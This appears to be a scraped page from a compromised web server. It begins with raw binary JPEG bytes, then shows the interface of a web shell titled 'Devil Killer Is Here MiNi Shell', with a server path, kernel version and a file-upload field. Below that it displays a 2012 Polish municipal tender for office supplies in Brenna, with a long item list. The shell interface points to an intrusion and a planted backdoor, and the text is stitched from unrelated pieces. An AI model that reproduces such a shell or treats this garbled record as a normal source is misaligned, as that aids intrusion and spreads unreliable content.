JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120103/1969-N-2012.html

<p class="kh_header"><b>Brenna: Dostawa materiałów biurowych do Urzędu Gminy w Brennej</b><br>
<b>Numer ogłoszenia: 1969 - 2012; data zamieszczenia: 03.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brenna , ul. Wyzwolenia 77, 43-438 Brenna, woj. śląskie, tel. 033 8536222, faks 033 8536370.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brenna.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych do Urzędu Gminy w Brennej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy dostawy materiałów biurowych do Urzędu Gminy w Brennej, wg zadań jak niżej :

Nr  zadania	Nazwa zadania	Ilość pozycji wg. asortymentu w poszczególnych zadaniach
Zadanie 1	Dostawa materiałów biurowych. 	86 poz.
Zadanie 2	Dostawa materiałów eksploatacyjnych do drukarek oraz płyt CD.	33 poz.
Zadanie 3	Dostawa druków - potwierdzenia odbioru	2 poz.
2.2. Wszystkie dostarczone produkty w ramach powyższego asortymentu, powinny spełniać wymogi bezpieczeństwa i jakości określone obowiązującymi przepisami. Posiadać odpowiednie oznaczenia na opakowaniu lub obowiązkowe certyfikaty. Na żądanie Zamawiającego Wykonawca winien udokumentować posiadanie certyfikatu bezpieczeństwa i jakości dla wskazanego produktu. 

2.3 Ustalenia organizacyjne związane z wykonaniem zamówienia;
       1) Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy;
       2) Wykonawca określi telefony kontaktowe i numery faksów ów oraz dokona innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia;
       3) Wykonawca dostarczy przedmiot umowy własnym transportem, na własny koszt i na własne ryzyko do Urzędu Gminy w Brennej
       4) Za dzień zakończenia wszystkich zobowiązań umowy uważa się dzień, w którym podpisane zostaną w Protokoły odbioru bez zastrzeżeń.

2.4. Wymagania stawiane Wykonawcy:
       1) Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia w okresie  wykonywania umowy jak i w okresie trwania gwarancji;
       2) Wykonawca na wszystkie dostarczone produkty  udzieli Zamawiającemu 2 letniej gwarancji, licząc od daty wystawienia faktury. W ramach gwarancji Wykonawca  wymieni towar uszkodzony na towar wolny od wad na własny koszt. Zakres gwarancji nie obejmuje uszkodzeń spowodowanych z winy Zamawiającego, na skutek przypadków losowych, zużyciem naturalnym, działaniem zewnętrznym (uderzenie, zalanie itp.), nieprzestrzeganiem zasad użytkowania lub użytkowaniem niezgodnym z przeznaczeniem, wpływami chemicznymi lub elektrycznymi. Podstawą udzielenia gwarancji jest faktura zakupu.
       2) Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia do czasu wygaśnięcia zobowiązań Wykonawcy wobec Zamawiającego;
      3) Wymagana jest należyta staranność przy realizacji zamówienia.
2.5. Szczegółowe postanowienia dotyczące wykonywania zobowiązań wynikających z niniejszego zamówienia publicznego, w tym m.in. odnoszących się do reklamacji.

Ewentualnie podane nazwy własne producentów lub wyrobów należy traktować jako przykładowe. Oznacza to, że można zastosować materiały i wyroby podane jako przykładowe lub równoważne, pod warunkiem uzyskania parametrów technicznych równych lub lepszych niż uzyskane poprzez realizację wg wskazań dokumentacji technicznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Formularz oferty według załączonego wzoru (załącznik nr 1) oraz wykazem cenowym materiałów załącznik nr 5.
2/ W przypadku, gdy dokumenty przetargowe podpisują inne osoby niż ujawnione w rejestrach, do oferty należy dołączyć pełnomocnictwo udzielone przez osoby upoważnione, z zaznaczeniem zakresu i okresu udzielonego pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Działając zgodnie z Art.144 ust 1 Ustawy Prawo Zamówień Publicznych Zamawiający dopuszcza możliwość zmiany treści umowy w stosunku do oferty w szczególności                  w przypadkach:
1.1.	 Zmian ogólnych:
- zmiany będące skutkiem poprawy oczywistej pomyłki pisarskiej bądź rachunkowej.
-  zmiany stanu prawnego mające wpływ na realizację przedmiotu zamówienia.
1.2. Zmian wpływających na wynagrodzenie
- możliwa jest zmiana postanowień umowy w związku ze zmiana stawki podatku od towarów i usług (VAT)
- z obniżeniem kosztu wykonania usług a tym samym wynagrodzenia Wykonawcy (na korzyść Zamawiającego) wynikająca z przyczyn technicznych, technologicznych, organizacyjnych, których przed zawarciem umowy nie można było przewidzieć.
1.3. Innych zmian - z zastrzeżeniem art. 140 ust.3 ustawy Prawo zamówień publicznych
2. Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.
3. Zamawiający zastrzega sobie prawo odstąpienia od umowy w przypadkach wskazanych     w umowie i ustawie oraz gdy:
a) zostanie ogłoszona likwidacja lub upadłości Wykonawcy,
b) Wykonawca nie rozpoczął realizacji umowy w terminie,
c) Wykonawca dopuścił się rażącego naruszenia innych istotnych postanowień umowy,         d) Wykonawca przerwał realizację dowozu z przyczyn leżących po jego stronie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.brenna.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Brennej ul. Wyzwolenia 77
43-438 Brenna
pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2012 godzina 11:30, miejsce: Urząd Gminy w Brennej ul. Wyzwolenia 77
43-438 Brenna
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier ksero format A4: przeznaczony do wysokonakładowych drukarek laserowych, atramentowych i kopiarek; technologia ColorLok; gramatura: 80 g/m 2, białość: CIE  146, opakowanie 1 ryza 500ark	ryzy	900
Papier ksero format A3: przeznaczony do wysokonakładowych drukarek laserowych, atramentowych i kopiarek; technologia ColorLok; gramatura: 80 g/m 2, białość: CIE  146, opakowanie 1 ryza 500 ark.	ryzy	5
Segregator A4 szerokość grzbietu 50mm; bez listwy metalowej; wykonane z tektury pokrytej ekologiczną folią polipropylenową; gramatura kartonu:1290 g/m2,grubość kartonu:2,1 mm; dźwignia wysokiej jakości; wymienna obustronna etykieta grzbietowa; wymiary: 285* 320mm; kolory: czarny, granatowy; żółty, niebieski, czerwony; fioletowy,	szt.	250
Segregator A4 szerokość grzbietu 75 mm; bez listwy metalowej; wykonane z tektury pokrytej ekologiczną folią polipropylenową; gramtura kartonu:1290 g/m2,grubość kartonu:2,1 mm; dźwignią wysokiej jakości; wymienna obustronna etykieta grzbietowa; wymiary: 285* 320mm; mix kolorów	szt.	200
Zszywki : wytrzymałe; wysokiej jakości; rozmiar 24/6; opakowanie 1000 szt.	opakowanie	80
Zszywki: wytrzymałe ; wysokiej jakości; rozmiar 10 małe; opakowanie 1000 szt.	opakowanie	150
Klipy do papieru: 32 mm; wykonane z metalu; opakowanie 12 szt.	opakowanie	20
Klipy do papieru: 19 mm; wykonane z metalu; opakowanie 12 szt.	opakowanie	5
Klipy do papieru: 51 mm; wykonane z metalu; opakowanie 12 szt.	opakowanie	2
Mechanizm skoroszytowy; umożliwia spinanie luźnych kartek; opakowanie 25 szt.; mix kolor	opakowanie	25
Koszulki krystaliczne A4; wykonane z folii PP; multiperforowane- pasujące do każdego segregatora; 55 mic krystaliczne; opakowanie 100 szt. w pudełku	pudełko	40
Skoroszyt kartonowy oczkowy połówkowy; wykonany z kartonu o grubości 250g/m 2; kolor biały	szt.	450
Skoroszyt kartonowy oczkowy pełny; wykonany z kartonu o grubości 250g/m 2; kolor biały	szt.	400
Teczka na hak; wykonana z kartonu o grubości 350 g/m2; kolor biały; na dokumenty formatu A4	szt.	100
Teczka z gumką; wykonana z kartonu o grubości 350 g/m2; na dokumenty formatu A4	szt.	100
Teczka na wiązanie; wykonana z kartonu o grubości 350 g/m2; na dokumenty formatu A4	szt	200
Pinezki do tablicy beczułki; trwałe; kolorowe; opakowanie 14 szt.	opakowanie	2
Spinacz okrągły;metalowe;  rozmiar 50 mm; opakowanie 100 szt.	opakowanie	4
Linijka: wykonane z polistyrenu; twałe nieścieralne podziałki; zaokrąglone rogi; długość 30 zm.	szt.	5
Kostki samoprzylepne; kolorowe ; rozmiar 75*75; kolor pastelowy 400 kartek	szt.	10
Kostka biała; notes 8,5 *85*3,5 cm; kolor biały	szt.	20
Karteczki samoprzylepne: rozm. 75*75: bloczek 100 kartek	bloczki	100
Karteczki samoprzylepne: rozm. 50*75: bloczek 100 kartek	bloczki	100
Karteczki samoprzylepne: rozm. 40*50: bloczek 100 kartek	bloczki	60
Baterie:  R 3; alkaliczne; do urządzeń o średnim poborze mocy; opakowanie 4 szt.	opakowanie	7
Baterie AA; alkaliczne; do urządzeń o średnim poborze mocy; opakowanie 4 szt	opakowanie	5
Grzbiety wsuwane: standard; trwałe; 10 mm; kolor czarny i niebieskie; opakowanie 50 szt.	opakowanie	2
Grzbiety plastikowe do bindowania: kolor niebieski i kolor czarny 19 mm;opakowanie 100 szt.	opakowanie	2
Grzbiety plastikowe do bindowania: ; kolor niebieski i kolor biały 12,5 mm;opakowanie 100 szt.	opakowanie	2
Okładki do bindowania: Delta; dwustronnie kolorowe, kolor bordowy i niebieski; opakowanie 100 szt.	opakowanie	1
Grzbiety wsuwane: A4/ 90 kartek; oprawa dokumentów o max 150 kartek;  kolor biały i niebieski; opakowanie 25 szt.	opakowanie	3
Grzbiety wsuwane: A4/ 60 kartek; oprawa dokumentów o max 150 kartek; trwały; kolor przezroczysty i czarny; opakowanie 25 szt.	opakowanie	3
Spinacze w pudełku magnetycznym:100 szt.; spinacze kolor metalowy; 	opakowanie	5
Zszywacz mały ST-010VH i ST-010AH: ładowanie od góry; mechanizm redukujący siłę potrzebną do zszywania o 50 %; elementy konstrukcyjne wykonane z metalu; wbudowany rozszywacz; kolor czarny	szt.	10
Zszywacz: dobrej jakości wykonany z trwałego materiału; ładowanie zszywek z góry o rozm. 24/6; kolor czarny	szt.	10
Rozszywacz do zszywek: do zszywek o rozm. 24/6/, 26/6, 10; wyposażony w blokadę; mix kolor	szt.	3
Dziurkacz mały: precyzyjny ogranicznik formatu z okienkami do jego podglądu; pojemnik na ścinki, ergonomiczny uchwyt umożliwiający zmniejszenie siły nacisku; kolor czarny	szt.	3
Dziurkacz duży: precyzyjny ogranicznik formatu z okienkami do jego podglądu; pojemnik na ścinki, ergonomiczny uchwyt umożliwiający zmniejszenie siły nacisku; kolor czarny	szt.	4
Nożyczki: ostrze wykonane ze stali nierdzewnej; gumowy uchwyt; rozm. 16 cm	szt.	5
Taśma pakowa: do lekkich i średnio ciężkich opakowań; grubość 43 mic; nośnik PP; klej kauczuk naturalny; kolor przezroczysty	szt.	8
Taśma pakowa: do lekkich i średnio ciężkich opakowań; grubość 43 mic; nośnik PP; klej kauczuk naturalny; kolor brązowy	szt	8
Taśma biurowa: wykonana z polipropylenu; pokryta emulsyjnym klejem akrylowym; przezroczysta; 12x30	szt.	50
Taśma biurowa: wykonana z polipropylenu; pokryta emulsyjnym klejem akrylowym; przezroczysta; 24x30	szt	50
Długopis: cienka końcówka 0,7 mm; długość lini pisania 3000m; zakończenie i skuwka w kolorze tuszu; kolor niebieski	szt.	50
Długopis: cienka końcówka 0,7 mm; długość lini pisania 3000m; zakończenie i skuwka w kolorze tuszu; kolor czarny	szt.	50
Długopis: żelowy; automatycznie chowany wkład; zabezpieczenie przed poplamieniem; szerokość pisania od 0,2 mm do 0,7 mm ; kolor czerwony	szt.	30
Długopis: żelowy; automatycznie chowany wkład; zabezpieczenie przed poplamieniem; szerokość pisania od 0,2 mm do 0,7 mm; kolor niebieski	szt.	40
Długopis: automatycznie chowany; gumowy uchwyt; przezroczysta obudowa; szerokość lini pisania 0,3 mm; kolor: niebieski	szt.	150
Długopis: żelowy; przezroczysta obudowa; wodoodporny i nieblaknący tusz żelowy; kolor: niebieski	szt.	150
Ołówek automatyczny: w przezroczystej oprawie; gumka do ścierania; grubość grafitu 0,5 mm	szt.	6
Cienkopis:  tusz odporny na wysychanie; plastikowa końcówka oprawiona w metal: szerokość lini pisania 0,4 mm; wentylowana skuwka; opakowanie 10 szt.; kolor: czerwony	opakowanie	3
Cienkopis: idealny do pracy z linijką; tusz odporny na wysychanie; plastikowa końcówka oprawiona w metal: szerokość lini pisania 0,4 mm; wentylowana skuwka; opakowanie 10 szt.; kolor: czarny	opakowanie	3
Cienkopis; tusz odporny na wysychanie; plastikowa końcówka oprawiona w metal: szerokość lini pisania 0,4 mm; wentylowana skuwka; opakowanie 10 szt.; kolor: niebieski	opakowanie	4
Cienkopis: tusz odporny na wysychanie; plastikowa końcówka oprawiona w metal: szerokość lini pisania 0,4 mm; wentylowana skuwka; opakowanie 10 szt.; kolor: zielony	opakowanie	1
Marker: permanentny; dwie końcówki- cienką i ultra cienką: grubość lini UF 0,3 mm/ F 0,5 mm; kolor: czarny	szt.	5
Marker: permanentny; dwie końcówki- cienką i ultra cienką: grubość lini UF 0,3 mm/ F 0,5 mm; kolor: niebieski	szt.	7
Marker permanentny: do wszystkich powierzchni- foli, szkła, metalu; na bazie wody; tusz nie przesiąka przez papier; okrągła końcówka; 	szt.	10
Zakreślacz: do pisania po wszystkich rodzajach papieru; ścięta końcówka; szerokość lini pisania 1-5 mm; atrament pigmentowy; kolor: żółty; opakowanie 10 szt.	opakowanie	1
Zakreślacz: do pisania po wszystkich rodzajach papieru; ścięta końcówka; szerokość lini pisania 1-5 mm; atrament pigmentowy; pomarańczowy; opakowanie 10 szt.	szt.	1
Zakreślacz: do pisania po wszystkich rodzajach papieru; ścięta końcówka; szerokość lini pisania 1-5 mm; atrament pigmentowy;  zielony; opakowanie 10 szt.	opakowanie	1
Korektor: taśma odporna na zrywanie; doskonały i trwały efekt korygowania;  mechanizm regulacji napięcia taśmy; przezroczysta obudowa	szt.	20
Kalka maszynowa: do odbitek maszynowych; powlekana czarna masą pisząca; A 4; opakowanie 50 ark.	opakowanie	3
Kalka ołówkowa: do odbitek ręcznych; powlekana fioletową masą piszącą; A 4; kolor fioletowa; opakowanie 50 arkuszy	opakowanie	1
Przezroczyste zakładki indeksujące: do zaznaczania stron w dokumentach; opakowanie 4 kolory*40 szt.; rozmiar 20*50	opakowanie	20
Zakładki indeksujące: do zaznaczania stron w dokumentach; 4 kolory *40 szt.; rozm. 20*50; kolor mix	opakowanie	15
Kołozeszyt:  w kratkę; 80 kartek; A4	szt.	5
Brulion w oprawie twardej: 96 stron; A4; w kratkę	szt.	15
Brulion w oprawie twardej: 96 stron; A5; w kratke	szt.	17
Rolki kasowe: termoczułe; papier bezpyłowy; bezdrzewny, bezchlorowy; szerokość 57 mm; długość 30m; opakowanie:10 szt	opakowanie	10
Przekładki papierowe do segregatorów: wykonane z grubego papieru; przeznaczonego do segregowania dokumentów; dziurkowane; 1/3 A4; mix kolorów; opakowanie 100 szt.	opakowanie	6
Blok szkolny; biały	szt.	15
Klipy archiwizacyjne: do spinania dokumentów wypiętych z segregatora; kolor: biały; opakowanie: 100 szt.	opakowanie	20
Koperty: format C5; rozm.162*229; samoprzylepne, białe z paskiem; opakowanie: 500 szt	opakowanie	20
Koperty: format DL; rozm. 110*220mm; samoprzylepne, białe, okienko prawe; opakowanie: 500 szt.	opakowanie	60
Koperty: format C6; rozm. 114*162 mm; bez okienka, samoprzylepne, białe; opakowanie: 1000 szt.	opakowanie	10
Koperty: B4; rozm. 250*353*38,z rozszerzonym bokiem; kolor  opakowanie 250 szt.	opakowanie	1
Koperty: B4 rozm. A4, samoprzylepne, białe z paskiem, opakowanie 250 szt.	opakowanie	8
Koperty: Air Poc; format 14; rozm. 200*275; kolor: biały, samoprzylepne z paskiem	szt.	100
Koperty: Air Poc; format 11; rozm. 120*175; kolor: biały, samoprzylepne z paskiem	szt.	50
Koperty: Air Poc; format A4; kolor: biały, samoprzylepne z paskiem;	szt	100
